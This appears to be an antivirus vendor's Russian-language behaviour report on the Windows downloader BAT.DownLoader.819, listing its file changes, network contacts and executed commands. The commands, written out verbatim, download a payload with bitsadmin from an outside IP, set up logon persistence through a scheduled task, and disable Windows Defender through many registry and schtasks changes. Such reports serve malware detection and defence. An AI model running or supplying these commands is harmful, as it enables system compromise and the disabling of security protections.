BAT.DownLoader.819

Техническая информация

Для обеспечения автозапуска и распространения

Создает или изменяет следующие файлы

<SYSTEM32>\tasks\microsoft\windows\sysmain\diskcleaner

Вредоносные функции

Для затруднения выявления своего присутствия в системе

блокирует запуск следующих системных утилит:

Системный антивирус (Защитник Windows)

добавляет исключения антивируса:

'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath c:\users\public\documents

Изменения в файловой системе

Создает следующие файлы

%TEMP%\rarsfx0\newbegin.bat
C:\users\public\documents\bit81bc.tmp
%APPDATA%\d4602615-9d50-4880-be41-678935e93eaa\run.dat

Присваивает атрибут 'скрытый' для следующих файлов

C:\users\public\documents\bit81bc.tmp
C:\users\public\documents\scsisvc.exe

Удаляет следующие файлы

%TEMP%\rarsfx0\newbegin.bat

Перемещает следующие файлы

C:\users\public\documents\bit81bc.tmp в C:\users\public\documents\scsisvc.exe

Сетевая активность

Подключается к

'14#.#82.135.152':80
'17#.#2.199.252':8273

TCP

Запросы HTTP GET

http://14#.#82.135.152/dload/scsisvc.exe

UDP

DNS ASK mp####s.ddns.net

Другое

Ищет следующие окна

ClassName: 'EDIT' WindowName: ''

Создает и запускает на исполнение

'C:\users\public\documents\scsisvc.exe'
'C:\users\public\documents\scsisvc.exe' ' (со скрытым окном)

Запускает на исполнение

'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\RarSFX0\newbegin.bat" "
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
'%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
'%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
'%WINDIR%\syswow64\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "scsisvc.exe"
'%WINDIR%\syswow64\dism.exe' /Online /Enable-Feature /FeatureName:NetFx3 /All
'%WINDIR%\syswow64\bitsadmin.exe' /transfer debjob /download /priority foreground http://147.182.135.152:80/dload/scsisvc.exe "c:\users\public\documents\scsisvc.exe"
'%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN "\Microsoft\Windows\Sysmain\DiskCleaner" /RL HIGHEST /TR "c:\users\public\documents\scsisvc.exe"
'%WINDIR%\syswow64\schtasks.exe' /run /TN "\Microsoft\Windows\Sysmain\DiskCleaner"
'%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -file newbegin.bat
'<SYSTEM32>\taskeng.exe' {CC23158C-1422-4607-8A4A-FB56DCC9F8E8} S-1-5-21-1238866942-1249195528-555854008-1000:emngtcaccr\user:Interactive:[1]
'%WINDIR%\syswow64\attrib.exe' "c:\users\public\documents\scsisvc.exe" +r +a +s +h